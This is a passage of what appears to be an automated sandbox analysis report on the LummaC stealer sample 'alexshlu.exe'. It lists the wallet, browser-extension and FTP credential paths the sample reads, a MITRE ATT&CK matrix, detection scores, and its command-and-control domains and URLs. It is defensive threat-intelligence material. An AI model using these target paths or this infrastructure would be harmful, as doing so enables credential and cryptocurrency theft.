                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\BNAGMGSPLOJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\GAOBCVIQIJJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\KLIZUSIQENJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
                Source: Yara matchFile source: 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.1669509041.0000000000CF3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: alexshlu.exe PID: 7720, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: alexshlu.exe PID: 7720, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Windows Management Instrumentation                		1
                DLL Side-Loading                		211
                Process Injection                		11
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Screen Capture                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		211
                Process Injection                		LSASS Memory141
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager11
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares41
                Data from Local System                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                Obfuscated Files or Information                		NTDS1
                Process Discovery                		Distributed Component Object Model2
                Clipboard Data                		114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Software Packing                		LSA Secrets11
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials33
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                alexshlu.exe74%ReversingLabsWin32.Trojan.LummaStealer
                alexshlu.exe75%VirustotalBrowse
                alexshlu.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://lev-tolstoi.com/s0%Avira URL Cloudsafe
                https://steambroadcast-test.akamaized0%Avira URL Cloudsafe
                https://lev-tolstoi.com/p0%Avira URL Cloudsafe
                https://lev-tolstoi.com/V0%Avira URL Cloudsafe
                https://lev-tolstoi.com/t0%Avira URL Cloudsafe
                https://lev-tolstoi.com/pid0%Avira URL Cloudsafe
                https://store.steampower0%Avira URL Cloudsafe
                https://impend-differ.biz:443/apiG100%Avira URL Cloudmalware
                https://lev-tolstoi.com:443/apirofiles/765611997243319000%Avira URL Cloudsafe
                https://lev-tolstoi.com/0%Avira URL Cloudsafe
                https://lev-tolstoi.com/lB0%Avira URL Cloudsafe
                https://lev-tolstoi.com/Def40%Avira URL Cloudsafe
                https://www.google.comHI20%Avira URL Cloudsafe
                https://lev-tolstoi.com:443/apil0%Avira URL Cloudsafe
                https://lev-tolstoi.com/apir0%Avira URL Cloudsafe
                https://lev-tolstoi.com/api0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                steamcommunity.com
                		23.55.153.106
                		truefalse
                  		high
                  lev-tolstoi.com
                  		172.67.157.254
                  		truefalse
                    		high
                    dare-curbys.biz
                    		unknown
                    		unknownfalse
                      		high
                      impend-differ.biz
                      		unknown
                      		unknownfalse
                        		high
                        se-blurry.biz
                        		unknown
                        		unknownfalse
                          		high
                          zinc-sneark.biz
                          		unknown
                          		unknownfalse
                            		high
                            print-vexer.biz
                            		unknown
                            		unknownfalse
                              		high
                              dwell-exclaim.biz
                              		unknown
                              		unknownfalse
                                		high
                                covery-mover.biz
                                		unknown
                                		unknownfalse
                                  		high
                                  formy-spill.biz
                                  		unknown
                                  		unknownfalse
                                    		high
                                    drive-connect.cyou
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      dare-curbys.bizfalse
                                        		high
                                        formy-spill.bizfalse
                                          		high
                                          https://steamcommunity.com/profiles/76561199724331900false
                                            		high
                                            https://lev-tolstoi.com/apitrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            print-vexer.bizfalse
                                              		high
                                              impend-differ.bizfalse
                                                		high
                                                dwell-exclaim.bizfalse
                                                  		high
                                                  zinc-sneark.bizfalse
                                                    		high
                                                    se-blurry.bizfalse
                                                      		high

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://duckduckgo.com/chrome_newtabalexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://player.vimeo.comalexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&ampalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://impend-differ.biz:443/apiGalexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
                                                                https://steamcommunity.com/?subsection=broadcastsalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://lev-tolstoi.com/salexshlu.exe, 00000003.00000003.1690595429.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754859898.0000000003575000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://lev-tolstoi.com/talexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754859898.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://lev-tolstoi.com/palexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://lev-tolstoi.com:443/apirofiles/76561199724331900alexshlu.exe, 00000003.00000003.1476498651.0000000000C77000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://lev-tolstoi.com/pidalexshlu.exe, 00000003.00000003.1665750485.0000000003576000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://store.steampowered.com/subscriber_agreement/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.gstatic.cn/recaptcha/alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://store.steampowered.comalexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.valvesoftware.com/legal.htmalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=enalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.youtube.comalexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.google.comalexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://lev-tolstoi.com/Valexshlu.exe, 00000003.00000003.1566499770.00000000034F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=englalexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englisalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbCalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://s.ytimg.com;alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=0Xxxalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://steambroadcast-test.akamaizedalexshlu.exe, 00000003.00000003.1754962264.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    		unknown
                                                                                                    https://community.fastly.steamstatic.com/alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://steam.tv/alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://store.steampoweralexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://lev-tolstoi.com/alexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1690595429.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754749506.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607970298.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607038049.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607038049.000000000356B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1665843537.00000000034F1000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774860392.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1776241795.0000000003576000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://store.steampowered.com/privacy_agreement/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1528531670.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://steamcommunity.com:443/profiles/76561199724331900alexshlu.exe, 00000003.00000003.1425694301.0000000000C76000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://store.steampowered.com/points/shop/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://lev-tolstoi.com/lBalexshlu.exe, 00000003.00000003.1476674345.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1430945749.0000000000CA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://ocsp.rootca1.amazontrust.com0:alexshlu.exe, 00000003.00000003.1608240091.0000000003501000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://steamcommunity.com/calexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://lev-tolstoi.com/Def4alexshlu.exe, 00000003.00000003.1607970298.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1609739320.0000000003575000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1607038049.0000000003576000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1665750485.0000000003576000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aalexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://sketchfab.comalexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.ecosia.org/newtab/alexshlu.exe, 00000003.00000003.1529377207.0000000003528000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529199963.000000000352B000.00000004.00000800.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1529270353.0000000003528000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://lv.queniujq.cnalexshlu.exe, 00000003.00000003.1425694301.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://steamcommunity.com/profiles/76561199724331900/inventory/alexshlu.exe, 00000003.00000003.1476349816.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1428527642.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425525147.0000000000CE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
